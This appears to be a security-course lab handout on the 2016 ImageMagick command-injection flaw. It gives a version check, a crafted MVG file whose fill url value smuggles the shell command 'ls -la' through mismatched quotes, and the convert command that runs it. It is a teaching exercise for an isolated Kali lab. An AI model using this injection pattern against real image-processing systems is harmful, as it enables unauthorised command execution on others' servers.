Security Notes | Integer Cyber Security: Exploiting ImageMagick

 

Proj X19: Exploiting ImageMagick (Up to 30 pts.)

Purpose

This is a very simple exploit that was made public on May 4, 2016. It's a code injection vulnerability, caused by software that takes user input and uses it to construct a command line.

What You Need

• A Kali 2 machine, real or virtual

Task 1: Proof of Concept (5 pts.)

Checking ImageMagick Version

This bug has been patched, so if you have recently updated, your version may not be vulnerable. To check your version, in a Kali Terminal window, execute this command:

convert -version

When I did it, my version was "ImageMagick 6.8.9-9", as shown below. This version is vulnerable. If you see a different version number, check the Sources at the bottom of this project to see if it's vulnerable.

Creating the Exploit File

In a Kali Terminal window, execute this command:

nano exploit.mvg

In nano, enter the code shown below. Notice the mismatched single-quotes and double-quotes and the https URL that won't resolve. The vulnerability is in the https processor, and the payload of this exploit is the "ls -la" at the end.

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com"|ls "-la)'
pop graphic-context

Press Ctrl+X, Y, Enter to save the file. In a Kali Terminal window, execute this code:

convert exploit.mvg out.png

The "ls -la" command executes, listing the files in your working directory, as shown below.

Saving the Screen Image

Make sure you can see these two required items, as shown in the image above:

• A convert command followed by a filename ending in .mvg
• A file listing showing the same filename ending in .mvg with a Date

Save a whole-desktop image, using a filename of "Proj X19a from YOUR NAME".